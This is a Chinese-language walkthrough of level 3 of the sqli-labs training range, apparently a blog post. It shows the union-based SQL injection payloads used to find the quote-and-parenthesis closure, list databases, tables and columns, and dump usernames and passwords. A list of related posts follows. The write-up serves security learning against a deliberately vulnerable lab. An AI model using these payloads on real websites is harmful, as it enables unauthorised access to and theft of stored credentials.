SQL注入sqli_labs靶场第三题

?id=1'and 1=1 and '1'='1和?id=1'and 1=1 and '1'='1进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。

根据报错信息判断为单引号带括号注入

联合查询:

猜解列名

?id=1') order by 3--+

判断回显点

?id=-1') union select 1,2,3--+

爆库、版本号、权限

?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,user()--+

爆表、爆列

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

爆账号密码

?id=-1') union select 1,2,(select group_concat(username,password))from users

相关推荐
小马同学-7 小时前
MySQL主从复制和读写分离
数据库·mysql
海绵宝宝转agent7 小时前
MySql高频面试八股开源笔记总结
mysql·面试·开源
余槐i9 小时前
数据没回滚也不报错:@Transactional 自调用失效的 3 种复现与修复
spring boot·mysql·多线程·spring 事务
写后端的胖头鱼13 小时前
【高频面试题】FullText 全文索引(MySQL)
数据库·mysql·索引·全文索引
code_whiter15 小时前
01-MySQL数据库基础
数据库·mysql
vx_Biye_Design18 小时前
springboot宠物领养与救助平台64334-计算机课程设计、毕业设计
java·vue.js·spring boot·后端·mysql·课程设计·宠物
Elastic 中国社区官方博客18 小时前
错误最多的服务运行正常:使用 ES|QL 从日志进行根因分析
大数据·运维·数据库·sql·elasticsearch·搜索引擎·全文检索
做运维的阿瑞18 小时前
mysql数据库视图笔记:创建、修改、删除与适用场景
数据库·笔记·mysql
Seraphina3618 小时前
DVWA(SQL Injection-High,XSS Reflected-Medium,XSS Stored-Medium)
数据库·经验分享·sql·网络安全·xss
2501_9336707919 小时前
2027风控策略岗秋招准备:SQL、Excel、建模的优先级与项目路径
人工智能·sql·excel